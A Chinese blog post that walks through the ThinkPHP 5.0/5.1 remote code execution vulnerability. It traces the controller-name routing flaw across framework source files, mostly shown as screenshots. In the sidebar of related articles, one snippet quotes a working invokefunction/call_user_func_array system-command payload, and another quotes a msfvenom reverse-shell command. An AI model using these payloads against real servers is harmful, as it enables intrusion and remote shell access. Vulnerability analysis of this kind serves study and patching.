命令执行php框架代码,ThinkPHP远程命令执行漏洞原理及复现

最新推荐文章于 2023-09-20 18:32:48 发布
最新推荐文章于 2023-09-20 18:32:48 发布
阅读量275 收藏
点赞数
文章标签: 命令执行php框架代码

2018年12月11日,exploit-db更新了一个thinkphp框架远程代码执行漏洞

exploit地址:https://www.exploit-db.com/exploits/45978

由于框架对控制器名没有进行足够的检测导致在没有开启强制路由的情况下getshell

漏洞影响范围

Thinkphp 5.1.0 - 5.1.31

Thinkphp 5.0.5 - 5.0.23

安装:

下载地址http://www.thinkphp.cn/donate/download/id/1125.html

下载完解压在/var/www/html/目录下即可

42745de615a86badb7e0720d6f43c126.png

漏洞分析

/thinkphp/library/think/App.php 行数:120

4cc280ac150d9209fccaf0aae15881c8.png

我们可以看到通过self::routerCheck函数进行路由检测

c8e642b8fe928305b833c5a09cbd87ed.png

我们可以看到又进入$request->path()函数

/thinkphp/library/think/Request.php 行数:416行

efdcaf2277ccdaccf82fcab55d069cb3.png

进入pathinfo()函数,继续追踪到384行

a04bb724be288ab3aa4b2f717950c684.png

Config::get('var_pathinfo')是配置文件中的设置的参数,默认值为s,从GET中获取键值,然后赋值给routeCheck中的$path

我们再回到App.php 行数:606

07f75f45847f99da41b92481caae3b34.png

这里会进行路由检测,检查$check后会进入else分支导入路由配置,接着检测路由url调度结果为$result,如果调度失败且开启了强制路由$must,则报出路由无效,接着进入Route::parseUrl函数,根据$path(自定义url)解析操作

开始跟踪parseUrl函数

/thinkphp/library/think/Route.php 行数:1208

2ff774d6674ac30cf6970158db3a119d.png

进入parseUrlPath函数 行数:1275

787acf09683dd6e4ff54843382fa8079.png

这里我们可以看到对模块/控制器/操作的url地址分割成数组来返回(没截好图有点重了)行数:1217

195a44a4aceafbc3050d79ff67a9017a.png

1767136598a425be029c05c43a9799ec.png

我们可以看到,返回的结果赋值为$path,提取路由信息又封装到$route,最后返回

thinkphp/library/think/App.php 行数:120

f43edea58cb2a82e77d7a0af98714262.png

进入self::exec函数 行数:445

6b56c51986deb0c09e0c16f9b9e419f8.png

我们可以看到模块/控制器/操作 的函数为self::module

开始跟踪module函数 行数:494

e12e95f22378b8fef80f5ff1030dd2c1.png

e7ad67f6c4e715c9176a8e8bcd2cfd2f.png

我们可以看到,根据$config['app_multi_module']进入多模块部署,$bind为NULL,又进入elseif分支,判断模块是否在禁止的列表里面$config['deny_module_list'],而且mmodule存在,$available = true,就不会抛出异常

module函数最后的返回值,发现$controller没有进行过滤,那么此时应该为think\app,也就是return self::invokeMethod($call, $vars);

d855d3f150dfd1541ef038409bb8202a.png

进入self::invokeMethod函数 行数:329

3076e1bf906af1ebed2fc980a226b7ce.png

此时穿进去的$call也就是$method,是一个数组,第一个元素是一个think\App对象,第二个元素则是调用方法名称的字符串invokefunction,然后通过反射ReflectionMethod获取这个对象下对应的方法

再通过函数$args = self::bindParams($reflect, $vars);获取传入的参数,也就是payload

宇宙探奇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2311
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
php防止远程提交,PHP如何防止远程提交
weixin_39634351的博客
03-10 73
一般来说,防止站外提交表单,无非就是对每一次打开表单或提交数据,都会需要加一个token来进行验证。这个其实与验证码做法没什么两样,下面来看几个防止站外远程提交表单的例子。例子一:我们每一次打开提交页面生成一个token,然后,保存在session中,当表单提交时,我们来判断当前的token值与session是否一致,如果是的,就是正常提交,否则,就是无效提交了。具体代码如下:...
漏洞复现-thinkphp-代码执行】vulfocus/thinkphp-cve_2018_1002015
10-14 1554
thinkphp-代码执行】函数
PHP木有执行权限可以web访问,linux 上运行Thinkphp提示权限问题
weixin_39637589的博客
03-11 166
简述qqc胜于蓝|优秀个人博客TP部署在linux会有目录权限问题,这个我想很多人都已经很熟悉了,除非你还没接触过tp或者没有将它部署在linux的经历,当然不止TP,只要框架里面目录涉及到自由写的权限方面的都需要去给对应的目录给予相应的权限然而今天遇到了一个新问题,就是runtime目录已经给予了777权限了,还是无法写入缓存文件的问题,这种问题在网上搜的话也不会有太多收获,因为百分之九十九都是...
CVE-2018-1002015】thinkphp命令执行漏洞
liuxiaoning_的博客
09-20 866
复现并分析【CVE-2018-1002015】thinkphp命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞,利用该漏洞执行命令,写入后门,获取webshell。
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp3.1.2的通用网站后台
10-28
thinkphp3.1.2的通用网站后台
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 987
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
php命令执行漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析
weixin_33989001的博客
03-21 907
1漏洞利用方式5.0版本POC(不唯一)命令执行:?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]文件写入:?s=index/thinkapp/invokefunction&function=call_user_func_arr...
ThinkPHP5.0使用命令执行代码逻辑
BoYou233的博客
07-23 1878
创建一个自定义命令类文件,新建application/common/command/Hello.php <?php namespace app\common\command; use think\console\Command; use think\console\Input; use think\console\input\Argument; use think\console\input\Option; use think\console\Output; use think\Db; cl
Thinkphp框架漏洞payload整合
weixin_51339377的博客
04-11 2209
PS:针对不同的情况有些payload可能不适用 可以都尝试尝试 一定要自己审计理解原理 部分payload来源以及合集来源: ​​​​​​ThinkPHP漏洞复现_半盏时光、旧梦悠长的博客-CSDN博客_thinkphp复现 深入学习理解可以参考如上的链接地址 Thinkphp 5.0.5-5.0.22 Thinkphp 5.1.0-5.1.30 远程代码执行漏洞(5.0.20最适用) payload如下:(这是执行system函数的payload) 在index.php后把响应内容..
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 545
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
学好Python开发你一定会用到这30框架
轻松学python的博客
11-07 982
现在Python成为了炽手可热的一门语言,在如何快速入门的同时,如何进行高效的开发是一门语言非常重要的优势。我们收集马哥Python了超过2000名学员的意见和建议,对Python常用的框架进行了梳理,这些框架包括事件I/O,OLAP,Web开发,高性能网络通信,测试,爬虫等。 Python目前主流的应用包括:Web开发、图形界面开发、系统网络运维、网络编程、科学数字计算、3D游戏开发,而我...
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell)
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
thinkphp 远程代码执行原理
最新发布
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值